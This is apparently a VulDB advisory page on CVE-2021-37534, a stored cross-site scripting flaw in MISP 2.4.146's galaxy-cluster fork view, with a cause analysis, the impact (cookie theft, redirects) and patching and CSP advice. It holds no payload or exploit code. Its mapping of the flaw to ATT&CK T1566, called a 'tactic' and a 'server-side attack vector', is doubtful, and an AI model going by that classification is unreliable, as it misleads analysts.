CVE-2021-37534 in MISP
Summary
by MITRE • 07/26/2021
app/View/GalaxyClusters/add.ctp in MISP 2.4.146 allows Stored XSS when forking a galaxy cluster.
VulDB is the best source for vulnerability data and more expert information about this specific topic.
Analysis
by VulDB Data Team • 06/23/2026
The vulnerability identified as CVE-2021-37534 represents a stored cross-site scripting flaw within the MISP (Malware Information Sharing Platform) software version 2.4.146. This security issue specifically affects the GalaxyClusters/add.ctp view file, which is part of the web application's user interface layer responsible for handling the creation and management of galaxy clusters. The vulnerability occurs during the process of forking existing galaxy clusters, a common operation within MISP that allows users to create copies of existing threat intelligence data structures. The flaw enables attackers to inject malicious scripts that persist in the application's database and execute whenever the affected page is accessed by other users.
The technical nature of this vulnerability aligns with CWE-79, which defines cross-site scripting as a code injection attack that occurs when an application includes untrusted data in a web page without proper validation or escaping. In this case, the stored XSS vulnerability arises from insufficient input sanitization and output encoding within the GalaxyClusters/add.ctp template. When a user forks a galaxy cluster, the application accepts user-supplied data that is subsequently stored in the database without adequate sanitization of potentially malicious content. This stored data is then rendered back to users without proper HTML escaping, creating an environment where attackers can inject script payloads that execute in the context of other users' browsers.
The operational impact of this vulnerability extends beyond simple script execution, as it can enable attackers to perform various malicious activities within the compromised MISP environment. According to ATT&CK framework tactic T1566, this vulnerability represents a server-side attack vector that can be exploited for initial access or privilege escalation. An attacker could craft malicious payloads that steal session cookies, redirect users to phishing sites, or even execute commands on behalf of other users. The persistent nature of stored XSS means that the malicious scripts remain active until manually removed from the database, potentially affecting multiple users over extended periods. This vulnerability is particularly concerning for security operations centers that rely on MISP for threat intelligence sharing, as compromised systems could lead to unauthorized access to sensitive threat data and operational capabilities.
Mitigation strategies for CVE-2021-37534 should focus on both immediate patching and defensive measures. Organizations using MISP 2.4.146 should upgrade to a patched version that addresses the input sanitization issues in the GalaxyClusters/add.ctp file. The fix should implement proper HTML escaping and input validation for all user-supplied data before storage and rendering. Additionally, implementing Content Security Policy (CSP) headers can provide an additional layer of protection against XSS attacks by restricting script execution. Network monitoring should be enhanced to detect unusual data submissions that might indicate exploitation attempts. Regular security audits of web application code should include thorough review of template files and data handling procedures to prevent similar vulnerabilities from emerging in other parts of the application. The vulnerability also highlights the importance of maintaining up-to-date security practices and following secure coding guidelines that emphasize proper input validation and output encoding.